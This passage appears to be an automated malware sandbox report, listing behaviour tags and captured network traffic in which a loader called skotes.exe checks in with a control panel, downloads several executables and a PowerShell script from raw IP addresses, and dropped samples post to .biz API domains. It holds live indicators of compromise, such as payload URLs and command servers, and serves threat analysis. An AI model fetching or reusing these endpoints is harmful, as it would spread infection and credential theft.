    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4920

Network

POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 4
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 08 Dec 2024 18:35:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 156
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 08 Dec 2024 18:35:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 08 Dec 2024 18:36:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 08 Dec 2024 18:36:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 08 Dec 2024 18:36:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 08 Dec 2024 18:36:36 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 08 Dec 2024 18:36:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 08 Dec 2024 18:36:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 08 Dec 2024 18:36:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 08 Dec 2024 18:36:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 08 Dec 2024 18:36:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://31.41.244.11/files/6554834407/B3vKvPi.exe

skotes.exe

Remote address:

31.41.244.11:80

Request

GET /files/6554834407/B3vKvPi.exe HTTP/1.1
Host: 31.41.244.11

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 08 Dec 2024 18:35:21 GMT
Content-Type: application/octet-stream
Content-Length: 2343424
Last-Modified: Sun, 08 Dec 2024 16:02:55 GMT
Connection: keep-alive
ETag: "6755c32f-23c200"
Accept-Ranges: bytes
GET

http://31.41.244.11/files/806475321/0tClIDb.exe

skotes.exe

Remote address:

31.41.244.11:80

Request

GET /files/806475321/0tClIDb.exe HTTP/1.1
Host: 31.41.244.11

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 08 Dec 2024 18:36:06 GMT
Content-Type: application/octet-stream
Content-Length: 1892352
Last-Modified: Sun, 08 Dec 2024 16:55:07 GMT
Connection: keep-alive
ETag: "6755cf6b-1ce000"
Accept-Ranges: bytes
GET

http://31.41.244.11/files/7658082748/wTMEVe8.exe

skotes.exe

Remote address:

31.41.244.11:80

Request

GET /files/7658082748/wTMEVe8.exe HTTP/1.1
Host: 31.41.244.11

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 08 Dec 2024 18:36:15 GMT
Content-Type: application/octet-stream
Content-Length: 4122624
Last-Modified: Sun, 08 Dec 2024 17:35:35 GMT
Connection: keep-alive
ETag: "6755d8e7-3ee800"
Accept-Ranges: bytes
GET

http://31.41.244.11/files/6554834407/ntRoEwh.exe

skotes.exe

Remote address:

31.41.244.11:80

Request

GET /files/6554834407/ntRoEwh.exe HTTP/1.1
Host: 31.41.244.11

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 08 Dec 2024 18:36:27 GMT
Content-Type: application/octet-stream
Content-Length: 2343424
Last-Modified: Sun, 08 Dec 2024 17:50:38 GMT
Connection: keep-alive
ETag: "6755dc6e-23c200"
Accept-Ranges: bytes
GET

http://31.41.244.11/files/5131681669/KeaEfrP.ps1

skotes.exe

Remote address:

31.41.244.11:80

Request

GET /files/5131681669/KeaEfrP.ps1 HTTP/1.1
Host: 31.41.244.11

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 08 Dec 2024 18:36:51 GMT
Content-Type: application/octet-stream
Content-Length: 2687
Last-Modified: Sun, 08 Dec 2024 18:34:47 GMT
Connection: keep-alive
ETag: "6755e6c7-a7f"
Accept-Ranges: bytes
DNS

atten-supporse.biz

78c83a40ec.exe

Remote address:

8.8.8.8:53

Request

atten-supporse.biz

IN A

Response

atten-supporse.biz

IN A

104.21.16.9

atten-supporse.biz

IN A

172.67.165.166
POST

https://atten-supporse.biz/api

0tClIDb.exe

Remote address:

104.21.16.9:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: atten-supporse.biz

Response

HTTP/1.1 200 OK

Date: Sun, 08 Dec 2024 18:36:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=2p5b0sligbovtcopjt1upqiotp; expires=Thu, 03-Apr-2025 12:22:52 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uDonfhQaqHtbAgea9S0xdc7ENtclC%2BAE7FaI6uhUg95uGZjwc4%2BnWddEtuwDdrNxDyIEqdsmcyz7rZAMQpTbq6evNXc0A7hOa2MWeb5%2FcQXX5YVEDDtJOSemnrOzTCiV%2BdQgE2w%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8eeedc1b0de1ef19-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=64265&min_rtt=55529&rtt_var=23235&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2863&recv_bytes=586&delivery_rate=53329&cwnd=248&unsent_bytes=0&cid=3aac789eed6d04c6&ts=283&x=0"
DNS

se-blurry.biz

78c83a40ec.exe

Remote address:

8.8.8.8:53

Request

se-blurry.biz

IN A

Response

se-blurry.biz

IN A

172.67.162.65

se-blurry.biz

IN A

104.21.81.153
POST

https://se-blurry.biz/api

0tClIDb.exe

Remote address:

172.67.162.65:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: se-blurry.biz

Response

HTTP/1.1 200 OK

Date: Sun, 08 Dec 2024 18:36:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=2gmvlh6ugqaatcop55qhqn0784; expires=Thu, 03-Apr-2025 12:22:53 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wWFPYGNVUuFOQN8Dyf3CN217RxnIajd7QHjmVqrEZx2vORNiGWz1tFm9bQqnAn4rK8b2%2FpP%2F70wTc%2FVSiCHTJ6VzVpZFyk%2BhB151JdZdZ6pH2cq1kvsREBe9XFJAe8m6"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8eeedc1d7c56950b-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=53990&min_rtt=47690&rtt_var=13471&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=581&delivery_rate=73139&cwnd=246&unsent_bytes=0&cid=1ad28a414aac9d1a&ts=268&x=0"
DNS

zinc-sneark.biz

78c83a40ec.exe

Remote address:

8.8.8.8:53

Request

zinc-sneark.biz

IN A

Response

zinc-sneark.biz

IN A

104.21.62.142

zinc-sneark.biz

IN A

172.67.136.167
POST

https://zinc-sneark.biz/api

0tClIDb.exe

Remote address:

104.21.62.142:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: zinc-sneark.biz

Response

HTTP/1.1 403 Forbidden

Date: Sun, 08 Dec 2024 18:36:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nuOaq6kp5cCwHqEXIsu0KHwZS6GEZrM3JBdUC7xBDKf0puCJ%2FpfPfG4su25vrEULToqgCk4acHtsrptJRon6Pc3BsLa%2BEvL18OfLLiqYndKfntdr1u7epYR1dLNdWfcx8w0%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8eeedc202fc69461-LHR
POST

https://zinc-sneark.biz/api

0tClIDb.exe

Remote address:

104.21.62.142:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Cookie: __cf_mw_byp=At1DrMkQJcWUu_7DjA9hMMLEpw.q8_TqJ0KPKb_8Ec8-1733682974-0.0.1.1-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 48
Host: zinc-sneark.biz

Response

HTTP/1.1 200 OK

Date: Sun, 08 Dec 2024 18:36:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=q98id6vupbtuld0s2f9a4pdb44; expires=Thu, 03-Apr-2025 12:22:53 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7c9O0NZF1Kc0pSsdS27kPqv4r%2FiE7qPBkRdaLfrhdl9Tf81iW2CP8PY0P507u9oHfMXAclltZyz5sg13Dkf%2FM2uwNxgd0GE%2Fmr2CZTgUJ9hmGLBwpZXMhqDDlhINBu9yL%2Fg%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8eeedc2119059461-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=64066&min_rtt=48282&rtt_var=29414&sent=14&recv=12&lost=0&retrans=0&sent_bytes=8126&recv_bytes=1057&delivery_rate=140789&cwnd=254&unsent_bytes=0&cid=77cecd6feea6960d&ts=429&x=0"
GET

http://185.215.113.16/luma/random.exe

skotes.exe

Remote address:

185.215.113.16:80

Request

GET /luma/random.exe HTTP/1.1
Host: 185.215.113.16

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 08 Dec 2024 18:36:36 GMT
Content-Type: application/octet-stream
Content-Length: 1866240
Last-Modified: Sun, 08 Dec 2024 17:40:04 GMT
Connection: keep-alive
ETag: "6755d9f4-1c7a00"
Accept-Ranges: bytes
GET

http://185.215.113.16/steam/random.exe

skotes.exe

Remote address:

185.215.113.16:80

Request

GET /steam/random.exe HTTP/1.1
Host: 185.215.113.16

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 08 Dec 2024 18:36:40 GMT
Content-Type: application/octet-stream
Content-Length: 1783296
Last-Modified: Sun, 08 Dec 2024 17:40:11 GMT
Connection: keep-alive
ETag: "6755d9fb-1b3600"
Accept-Ranges: bytes
GET

http://185.215.113.16/well/random.exe

skotes.exe

Remote address:

185.215.113.16:80

Request

GET /well/random.exe HTTP/1.1
Host: 185.215.113.16

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 08 Dec 2024 18:36:43 GMT
Content-Type: application/octet-stream
Content-Length: 970752
Last-Modified: Sun, 08 Dec 2024 17:38:16 GMT
Connection: keep-alive
ETag: "6755d988-ed000"
Accept-Ranges: bytes
GET

http://185.215.113.16/off/random.exe

skotes.exe

Remote address:

185.215.113.16:80

Request

GET /off/random.exe HTTP/1.1
Host: 185.215.113.16

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 08 Dec 2024 18:36:46 GMT
Content-Type: application/octet-stream
Content-Length: 2854912
Last-Modified: Sun, 08 Dec 2024 17:38:42 GMT
Connection: keep-alive
ETag: "6755d9a2-2b9000"
Accept-Ranges: bytes
POST

https://atten-supporse.biz/api

78c83a40ec.exe

Remote address:

104.21.16.9:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: atten-supporse.biz

Response

HTTP/1.1 200 OK

Date: Sun, 08 Dec 2024 18:36:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=4gq1rraha9jq7s4s75ir7n23n4; expires=Thu, 03-Apr-2025 12:23:18 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ha%2Bvr9%2BOIcnzTa0U5y1ZhpFkXtP1Ry630y5tmNaKrKphJGpwqi064u9mULzEoSuOSzkYbHwbURxPvmn1YQlkNfXHuVYXg5yO%2BCgGePIHWCzlivvFnQP7TeqsvkBceHeH2N%2BrDTM%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8eeedcb809e660f8-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=62483&min_rtt=47850&rtt_var=25389&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2862&recv_bytes=586&delivery_rate=74575&cwnd=246&unsent_bytes=0&cid=f8dc910aa0a51a3d&ts=303&x=0"
POST

https://se-blurry.biz/api

78c83a40ec.exe

Remote address:

172.67.162.65:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: se-blurry.biz

Response

HTTP/1.1 200 OK

Date: Sun, 08 Dec 2024 18:36:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=i0k3oll30kmtempvmpbmv4lgir; expires=Thu, 03-Apr-2025 12:23:18 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7rnkISQmloSjc9T6ZYOnzM70MHh2sIx%2FQ%2BsyHgoN%2Bu9VEDDoDmf4UCQOFtoLN8rrM47mDFoUb6V57oDgqIIWVTCqykSV5uJOctA7B89qWXkygV5%2BNssbaHLtfdjJM%2BGd"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8eeedcba6e76bec8-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=58718&min_rtt=54370&rtt_var=18143&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=581&delivery_rate=58514&cwnd=253&unsent_bytes=0&cid=2ae8e32f3cf009fc&ts=455&x=0"
POST

https://zinc-sneark.biz/api

78c83a40ec.exe

Remote address:

104.21.62.142:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: zinc-sneark.biz

Response

HTTP/1.1 403 Forbidden

Date: Sun, 08 Dec 2024 18:36:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DxqFYuJp9kmoOGXyncevmgWZheZhFbfyEqxNbVUCAfc6pUW%2B4Ng4MjSO9AZ0gBtf%2FZ0hhCDwrJJLIs376z0g3anMazv7%2F%2BoMaoFQLz1HmFAfqiOQ0S%2BgqbIn2%2BWoYXURpo4%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8eeedcbdcd589514-LHR
POST

https://zinc-sneark.biz/api

78c83a40ec.exe

Remote address:

104.21.62.142:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Cookie: __cf_mw_byp=QQKy5ulQguZXcwrxlwsnWBU2JLO3safH5Bvix7.KTg4-1733682999-0.0.1.1-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 53
Host: zinc-sneark.biz

Response

HTTP/1.1 200 OK

Date: Sun, 08 Dec 2024 18:36:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=h3jjvt916901hfgd5rp1mr4bae; expires=Thu, 03-Apr-2025 12:23:19 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FK1GilmItNpRt%2Fyc2oWGpfuc1Dy33EGeI%2Bo7huOIwTGOFIYwqcAjjLbV1qSWCqlpkFDtx%2FHO9ZDR6greBmyRt8WJVR91paDc8eg0d6FSzvXw%2BL5kX0M5QcBf3sSgZyqKLLA%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8eeedcbe5e2b9514-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=50580&min_rtt=48471&rtt_var=7121&sent=13&recv=12&lost=0&retrans=0&sent_bytes=8128&recv_bytes=1057&delivery_rate=164944&cwnd=251&unsent_bytes=0&cid=f7e27591555fec1f&ts=963&x=0"
GET

http://185.215.113.206/

2427caf3c8.exe

Remote address:

185.215.113.206:80

Request

GET / HTTP/1.1
Host: 185.215.113.206
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sun, 08 Dec 2024 18:36:42 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.206/c4becf79229cb002.php

2427caf3c8.exe

Remote address:

185.215.113.206:80

Request

POST /c4becf79229cb002.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----IJEHIDHDAKJDHJKEBFIE
Host: 185.215.113.206
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sun, 08 Dec 2024 18:36:42 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
DNS

youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

youtube.com

IN A

Response

youtube.com

IN A

216.58.213.14
DNS

spocs.getpocket.com

firefox.exe

Remote address:

8.8.8.8:53

Request

spocs.getpocket.com

IN A

Response

spocs.getpocket.com

IN CNAME

prod.ads.prod.webservices.mozgcp.net

prod.ads.prod.webservices.mozgcp.net

IN A

34.117.188.166
DNS

getpocket.cdn.mozilla.net

firefox.exe

Remote address:

8.8.8.8:53

Request

getpocket.cdn.mozilla.net

IN A

Response

getpocket.cdn.mozilla.net

IN CNAME

getpocket-cdn.prod.mozaws.net

getpocket-cdn.prod.mozaws.net

IN CNAME

prod.pocket.prod.cloudops.mozgcp.net

prod.pocket.prod.cloudops.mozgcp.net

IN A

34.120.5.221
GET

https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd

firefox.exe

Remote address:

216.58.213.14:443

Request

GET /account?=https://accounts.google.com/v3/signin/challenge/pwd HTTP/2.0
host: youtube.com
user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
upgrade-insecure-requests: 1
sec-fetch-dest: document
sec-fetch-mode: navigate
sec-fetch-site: none
sec-fetch-user: ?1
te: trailers
GET

https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30

firefox.exe

Remote address:

34.120.5.221:443

Request

GET /v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30 HTTP/2.0
host: getpocket.cdn.mozilla.net
user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
if-none-match: W/"5395-zuqlHshIosLNxsVZ1yDB7WQXaJg"
te: trailers
DNS

youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

youtube.com

IN A

Response

youtube.com

IN A

216.58.213.14
DNS

prod.ads.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.ads.prod.webservices.mozgcp.net

IN A

Response

prod.ads.prod.webservices.mozgcp.net

IN A

34.117.188.166
DNS

prod.ads.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.ads.prod.webservices.mozgcp.net

IN AAAA

Response
DNS

youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

youtube.com

IN AAAA

Response

youtube.com

IN AAAA

2a00:1450:4009:816::200e
DNS

prod.pocket.prod.cloudops.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.pocket.prod.cloudops.mozgcp.net

IN A

Response

prod.pocket.prod.cloudops.mozgcp.net

IN A

34.120.5.221
DNS

prod.content-signature-chains.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.content-signature-chains.prod.webservices.mozgcp.net

IN A

Response

prod.content-signature-chains.prod.webservices.mozgcp.net

IN A

34.160.144.191
DNS

shavar.prod.mozaws.net

firefox.exe

Remote address:

8.8.8.8:53

Request

shavar.prod.mozaws.net

IN A

Response

shavar.prod.mozaws.net

IN A

35.85.93.176

shavar.prod.mozaws.net

IN A

52.33.231.145

shavar.prod.mozaws.net

IN A

44.228.225.150
DNS

prod.pocket.prod.cloudops.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.pocket.prod.cloudops.mozgcp.net

IN AAAA

Response

prod.pocket.prod.cloudops.mozgcp.net

IN AAAA

2600:1901:0:524c::
DNS

prod.content-signature-chains.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.content-signature-chains.prod.webservices.mozgcp.net

IN AAAA

Response

prod.content-signature-chains.prod.webservices.mozgcp.net

IN AAAA

2600:1901:0:92a9::
DNS

shavar.prod.mozaws.net

firefox.exe

Remote address:

8.8.8.8:53

Request

shavar.prod.mozaws.net

IN AAAA

Response
DNS

prod.remote-settings.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.remote-settings.prod.webservices.mozgcp.net

IN A

Response

prod.remote-settings.prod.webservices.mozgcp.net

IN A

34.149.100.209
DNS

prod.remote-settings.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.remote-settings.prod.webservices.mozgcp.net

IN AAAA

Response
DNS

www.youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

www.youtube.com

IN A

Response

www.youtube.com

IN CNAME

youtube-ui.l.google.com

youtube-ui.l.google.com

IN A

142.250.180.14

youtube-ui.l.google.com

IN A

216.58.201.110

youtube-ui.l.google.com

IN A

172.217.169.78

youtube-ui.l.google.com

IN A

216.58.212.206

youtube-ui.l.google.com

IN A

142.250.187.206

youtube-ui.l.google.com

IN A

172.217.169.46

youtube-ui.l.google.com

IN A

142.250.187.238

youtube-ui.l.google.com

IN A

142.250.200.14

youtube-ui.l.google.com

IN A

216.58.204.78

youtube-ui.l.google.com

IN A

142.250.178.14

